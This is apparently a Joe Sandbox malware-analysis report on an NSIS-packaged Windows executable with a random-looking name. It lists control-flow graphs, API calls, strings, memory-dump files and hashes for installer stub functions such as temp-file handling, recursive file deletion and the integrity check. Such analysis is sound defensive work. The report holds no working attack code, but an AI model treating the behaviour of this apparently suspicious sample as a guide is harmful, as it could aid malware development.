                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 404375-404399 SetErrorMode GetVersion 1 4043b6 0->1 2 40439b-4043aa call 408299 0->2 4 4043bb-4043be 1->4 2->1 9 4043ac-4043b5 2->9 6 4043c0-4043c3 call 40820e 4->6 7 4043d9-404492 call 408299 * 2 InitCommonControls OleInitialize SHGetFileInfoA call 407cb6 GetCommandLineA call 407cb6 GetModuleHandleA 4->7 12 4043c8-4043d7 lstrlenA 6->12 20 404494-404499 7->20 21 40449e-4044b8 call 4078a4 CharNextA 7->21 9->1 12->4 20->21 24 4044be-4044c1 21->24 25 404560-40457e GetTempPathA call 4042bc 24->25 26 4044c7-4044cc 24->26 33 404580-40459f DeleteFileA call 403f03 25->33 34 4045a7-4045db GetWindowsDirectoryA call 407ce8 call 4042bc 25->34 27 4044d1-4044d9 26->27 28 4044ce-4044cf 26->28 30 4044e1-4044e4 27->30 31 4044db-4044dc 27->31 28->26 35 404543-40455b call 4078a4 30->35 36 4044e6-4044ed 30->36 31->30 47 4045a5-4045ee 33->47 48 404817-404824 call 404316 OleUninitialize 33->48 34->33 58 4045dd-4045e2 34->58 35->24 38 404500-404507 36->38 39 4044ef-4044fd 36->39 43 404509-404517 38->43 44 40451a-404521 38->44 39->38 43->44 49 404541 44->49 50 404523-40453f call 407cb6 44->50 59 404802-40480c call 4060fd 47->59 60 4045f4-404609 call 4078a4 47->60 62 404844-40484b 48->62 63 404826-40483f call 407836 48->63 49->35 50->25 64 404815 58->64 66 404811-404813 59->66 74 40460a-40460f 60->74 68 404851-40488e call 408299 * 3 62->68 69 40499e-4049a9 62->69 71 4049ac ExitProcess 63->71 64->48 66->48 94 404933-404942 call 408299 68->94 95 404894-40489b 68->95 69->71 76 404611-404617 74->76 77 404662-404681 call 4082eb call 407ce8 74->77 79 404619-40461a 76->79 80 40461c-40462d call 40815b 76->80 92 404683-404698 call 407ce8 77->92 93 404699-4046c8 call 407ce8 lstrcmpiA 77->93 79->74 89 404639-40465d call 407cb6 * 2 80->89 90 40462f-404634 80->90 89->59 90->64 92->93 93->90 108 4046ce-4046d7 93->108 106 404961-40498f 94->106 107 404944-40495d ExitWindowsEx 94->107 95->94 99 4048a1-4048c3 GetCurrentProcess 95->99 99->94 115 4048c5-404930 99->115 106->107 111 404991-40499d call 403903 106->111 107->111 112 40495f 107->112 113 4046e0 call 40774b 108->113 114 4046d9-4046de call 4076b0 108->114 111->69 112->69 123 4046e5-4046fb SetCurrentDirectoryA 113->123 114->123 115->94 124 404713-404735 call 407cb6 123->124 125 4046fd-404712 call 407cb6 123->125 131 40473e-404767 call 407e06 DeleteFileA 124->131 125->124 134 404769-40478b CopyFileA 131->134 135 4047dd-4047e4 131->135 134->135 137 40478d-4047cf call 408311 call 407e06 call 407779 134->137 135->131 136 4047ea-404800 call 408311 135->136 136->64 137->135 146 4047d1-4047dc CloseHandle 137->146 146->135
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32 ref: 00404388
                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 0040438F
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 004043CC
                                                                                                                                                                                                                                  • InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
                                                                                                                                                                                                                                  • OleInitialize.OLE32 ref: 00404405
                                                                                                                                                                                                                                  • SHGetFileInfoA.SHELL32 ref: 0040443A
                                                                                                                                                                                                                                  • GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404478
                                                                                                                                                                                                                                  • CharNextA.USER32 ref: 004044B1
                                                                                                                                                                                                                                    • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                    • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00000001,00000001), ref: 0040456F
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32 ref: 0040458D
                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32 ref: 004045B6
                                                                                                                                                                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 0040481C
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004049AC
                                                                                                                                                                                                                                    • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00000000,?,00000000), ref: 004048A1
                                                                                                                                                                                                                                  • ExitWindowsEx.USER32 ref: 00404953
                                                                                                                                                                                                                                    • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                    • Part of subcall function 004060FD: lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                    • Part of subcall function 004060FD: GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CharExitHandleModuleNextProcessWindows$AddressAttributesCommandCommonControlsCurrentDeleteDirectoryErrorInfoInitInitializeLineModePathProcTempUninitializeVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                  • String ID: /D=$ _?=$"C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe" $%$($62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Software Setup$UXTHEME
                                                                                                                                                                                                                                  • API String ID: 3796326152-2777048487
                                                                                                                                                                                                                                  • Opcode ID: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                                                                                                                                  • Instruction ID: 1612ab991b91f7509b6110098b19e500dbf275244ae378e5724325f5e1753ea3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F143F0908300AFD720AF65D94876BBBE4EF85704F41887EE5C8A7291D77C58458B6A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004085B8 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 192filestringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 298 4085b8-4085d4 call 40815b 301 4085f3-408601 298->301 302 4085d6-4085ee DeleteFileA 298->302 304 408603-408605 301->304 305 408615-40862e call 407cb6 301->305 303 40883e-408845 302->303 306 408824-40882a 304->306 307 40860b-40860f 304->307 312 408630-408646 call 407ce8 305->312 313 408648-408650 call 4078ce 305->313 306->303 307->305 309 4087cd-4087d8 call 408123 307->309 309->303 317 4087da-4087f8 call 407cf2 call 407a46 RemoveDirectoryA 309->317 321 408651-408654 312->321 313->321 332 4087fa-4087fe 317->332 333 40882c-408837 call 406fcb 317->333 323 408656-40865d 321->323 324 40865f-408670 call 407ce8 321->324 323->324 326 408671-4086a1 lstrlenA FindFirstFileA 323->326 324->326 330 4087b6-4087bd 326->330 331 4086a7-4086c2 call 4078a4 326->331 330->303 334 4087bf-4087cb 330->334 341 4086d2-4086d7 331->341 342 4086c4-4086d0 331->342 332->306 336 408800-408822 call 406fcb call 408311 332->336 340 40883c-40883d 333->340 334->306 334->309 336->340 340->303 341->342 343 4086d9 341->343 345 4086dc-4086df 342->345 343->345 346 4086e1-4086e6 345->346 347 4086fb-408716 call 407cb6 345->347 349 4086ec-4086ef 346->349 350 40878f-4087a6 FindNextFileA 346->350 356 408734-408749 call 407a46 DeleteFileA 347->356 357 408718-408721 347->357 349->347 353 4086f1-4086f5 349->353 350->331 355 4087ac-4087b5 FindClose 350->355 353->347 353->350 355->330 363 40874b-40874f 356->363 364 40877d-408788 call 406fcb 356->364 357->350 358 408723-408732 call 4085b8 357->358 368 40878d-40878e 358->368 365 408751-408773 call 406fcb call 408311 363->365 366 408775-40877b 363->366 364->368 365->368 366->350 368->350
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32 ref: 004085D9
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32 ref: 00408694
                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                  • String ID: ?$C:\Users\user\AppData\Local\Temp\nso877A.tmp\*.*
                                                                                                                                                                                                                                  • API String ID: 3200608346-2328712420
                                                                                                                                                                                                                                  • Opcode ID: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
                                                                                                                                                                                                                                  • Instruction ID: 15a94c35718d9934db7cd19974bec7e4185b96846047f3cacb9e12796964f464
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E7175B0908344AED720AF25CE4576EBBF8AF45714F45887EE8C5A7381CB3D8844CB5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00408123 Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                                                  • Opcode ID: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
                                                                                                                                                                                                                                  • Instruction ID: 11fd5c66118aeed7f08c7c2f326ea88146cd1b5fc0ef80ef14f89fbd5f6a2284
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20E0ECB5704204AFD700BFB89C4841B7AE9AB94714B84C929B9A5CB390D634C85287AA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004060FD Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 253registrystringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 147 4060fd-40611a call 408299 150 406136-406176 call 407b3a 147->150 151 40611c-406131 call 407be3 147->151 156 4061a7-4061b6 call 407ce8 150->156 157 406178-4061a4 call 407b3a 150->157 161 4061bb-4061e8 call 404ae0 call 40815b 151->161 156->161 157->156 167 4062be-4062cd call 40815b 161->167 168 4061ee-4061f3 161->168 174 4062e7-406329 LoadImageA 167->174 175 4062cf-4062e6 call 407e06 167->175 168->167 169 4061f9-406232 call 407b3a 168->169 169->167 179 406238-40623f 169->179 177 406405-40640c call 403903 174->177 178 40632f-40636b RegisterClassA 174->178 175->174 187 406411-406416 177->187 181 406374-406400 SystemParametersInfoA CreateWindowExA 178->181 182 40636d-40636f 178->182 184 406241-40625c call 4078a4 179->184 185 40625f-40626e call 407cde 179->185 181->177 186 40654e-406556 182->186 184->185 194 406270-406285 lstrcmpiA 185->194 195 4062a3-4062bd call 407cf2 call 407cb6 185->195 191 40653a-40653f 187->191 192 40641c-406428 call 404ae0 187->192 191->186 203 406513-406522 call 404c0d 192->203 204 40642e-406455 ShowWindow call 40820e 192->204 194->195 197 406287-406294 GetFileAttributesA 194->197 195->167 200 406296-406298 197->200 201 40629a-4062a2 call 4078ce 197->201 200->195 200->201 201->195 213 406541-406548 call 403903 203->213 214 406524-40652b 203->214 215 406464-406488 GetClassInfoA 204->215 216 406457-406463 call 40820e 204->216 223 40654d 213->223 214->191 221 40652d-406539 call 403903 214->221 219 40648a-4064bd GetClassInfoA RegisterClassA 215->219 220 4064be-406511 DialogBoxParamA call 403903 call 4049b4 215->220 216->215 219->220 220->223 221->191 223->186
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                    • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                    • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                  • LoadImageA.USER32(?,?,00000000,00000000), ref: 00406317
                                                                                                                                                                                                                                  • RegisterClassA.USER32 ref: 00406361
                                                                                                                                                                                                                                  • SystemParametersInfoA.USER32 ref: 00406392
                                                                                                                                                                                                                                  • CreateWindowExA.USER32 ref: 004063F7
                                                                                                                                                                                                                                  • ShowWindow.USER32 ref: 0040643E
                                                                                                                                                                                                                                  • GetClassInfoA.USER32(?,00000000), ref: 00406481
                                                                                                                                                                                                                                  • GetClassInfoA.USER32 ref: 004064A1
                                                                                                                                                                                                                                  • RegisterClassA.USER32 ref: 004064B7
                                                                                                                                                                                                                                  • DialogBoxParamA.USER32 ref: 004064ED
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcmpiwsprintf
                                                                                                                                                                                                                                  • String ID: _Nb$g
                                                                                                                                                                                                                                  • API String ID: 3995538257-1858570778
                                                                                                                                                                                                                                  • Opcode ID: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                                                                                                                                  • Instruction ID: 933614cd0025173359140365b9e7a590c615df7829bf1f80af9a09b402b61920
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75B10AB05083019FE710AF65D94872BBBE4EF44308F41892EE4D597391D7BC9895CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403F03 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 216memoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 230 403f03-403f6d GetTickCount GetModuleFileNameA call 407a78 233 4042b1-4042b8 230->233 234 403f73-403fc4 call 407cb6 call 4078ce call 407cb6 GetFileSize 230->234 241 403fce-403fd0 234->241 242 4040c3-4040d6 call 4039fe 241->242 243 403fd6-403ffb call 403ae9 241->243 250 4040d8 242->250 251 40412d-40413a 242->251 247 404000-404004 243->247 248 404006-404012 call 4039fe 247->248 249 404017-40401e 247->249 253 404168-40416d 248->253 254 404024-404050 call 407a23 249->254 255 4040ed-4040f1 249->255 250->253 256 404172-4041f0 GlobalAlloc call 408904 call 407ad4 CreateFileA 251->256 257 40413c-404144 call 403b31 251->257 253->233 260 4040ff-404105 254->260 271 404056-404060 254->271 259 4040f3-4040fa call 4039fe 255->259 255->260 256->233 279 4041f6-40424b call 403b31 call 403d52 256->279 269 404149-40415e call 403ae9 257->269 259->260 267 404120-404128 260->267 268 404107-40411e call 408898 260->268 267->241 268->267 269->253 278 404160-404166 269->278 271->260 276 404066-404070 271->276 276->260 280 404076-404080 276->280 278->253 278->256 287 404250-404259 279->287 280->260 282 404082-40408c 280->282 282->260 284 40408e-4040b1 282->284 284->253 286 4040b7-4040bb 284->286 288 4040dd-4040eb 286->288 289 4040bd-4040c1 286->289 287->253 290 40425f-404273 287->290 288->260 289->242 289->288 291 404275 290->291 292 40427b 290->292 291->292 293 404280-404281 292->293 294 404283-404287 293->294 295 404289-4042ae call 407a23 293->295 294->293 295->233
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403F0F
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 00403F36
                                                                                                                                                                                                                                    • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                    • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                    • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                    • Part of subcall function 004078CE: lstrlenA.KERNEL32 ref: 004078DB
                                                                                                                                                                                                                                    • Part of subcall function 004078CE: CharPrevA.USER32 ref: 004078F0
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,74DF3160), ref: 00403FB5
                                                                                                                                                                                                                                    • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32 ref: 00404183
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,00000000), ref: 004041DC
                                                                                                                                                                                                                                    • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004041EB
                                                                                                                                                                                                                                  • Error launching installer, xrefs: 00403F68
                                                                                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00404168
                                                                                                                                                                                                                                  • soft, xrefs: 00404076
                                                                                                                                                                                                                                  • Inst, xrefs: 00404066
                                                                                                                                                                                                                                  • @, xrefs: 00404294
                                                                                                                                                                                                                                  • Null, xrefs: 00404082
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Create$AllocAttributesCharCountDestroyGlobalModuleNamePrevReadSizeTickWindowlstrcpynlstrlen
                                                                                                                                                                                                                                  • String ID: @$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                                                  • API String ID: 3119619987-3242305175
                                                                                                                                                                                                                                  • Opcode ID: 4fc0a7fd32f7e4debefb30af515cdd6f92a2255b0d2dd10cb1272751b383b930
                                                                                                                                                                                                                                  • Instruction ID: b38f96b7e78b57fcd3b2806388120572df800b880dbb1f433db2e5bcd9a6e09c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fc0a7fd32f7e4debefb30af515cdd6f92a2255b0d2dd10cb1272751b383b930
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1791A4B09083048FD720AF29D98576EBBF4EF84318F41847EE584A7291D77C9985CF9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401B06 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 185timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CompareFileTime.KERNEL32(?,00000000), ref: 00401BA1
                                                                                                                                                                                                                                    • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                    • Part of subcall function 00407836: MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
